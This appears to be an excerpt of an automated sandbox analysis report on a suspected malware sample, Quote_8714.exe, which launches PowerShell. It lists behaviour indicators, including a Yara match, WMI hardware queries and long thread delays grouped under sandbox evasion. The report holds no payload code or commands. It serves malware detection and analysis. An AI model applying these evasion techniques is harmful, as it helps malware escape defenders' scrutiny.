                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: Quote_8714.exe PID: 4464, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Quote_8714.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory allocated: 1020000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory allocated: 8E30000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory allocated: 7840000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory allocated: 9E30000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory allocated: AE30000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory allocated: CA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory allocated: 2A80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory allocated: 1020000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6001Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3777Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeWindow / User API: threadDelayed 2122Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeWindow / User API: threadDelayed 7733Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 6044Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7480Thread sleep count: 2122 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7480Thread sleep count: 7733 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep count: 36 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -99890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -99781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -99671s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -99562s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -99453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -99343s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -99234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -99125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -99015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -98906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -98751s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -98625s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -98498s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -98390s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -98281s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -98172s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -98062s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -97953s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -97843s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -97734s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -97625s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -97515s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -97406s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -97296s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -97185s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -97078s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -96968s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -96859s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -96750s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -96637s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -96530s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -96421s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -96287s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -96159s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -95953s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -95799s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -95672s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -95562s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -95453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -95343s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -95234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -95125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -95015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -94906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -94796s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -94687s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -94577s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exe TID: 7484Thread sleep time: -94468s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\Quote_8714.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Quote_8714.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 99890Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 99781Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 99671Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 99562Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 99453Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 99343Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 99234Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 99125Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 99015Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 98906Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 98751Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 98625Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 98498Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 98390Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 98281Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 98172Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 98062Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 97953Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 97843Jump to behavior
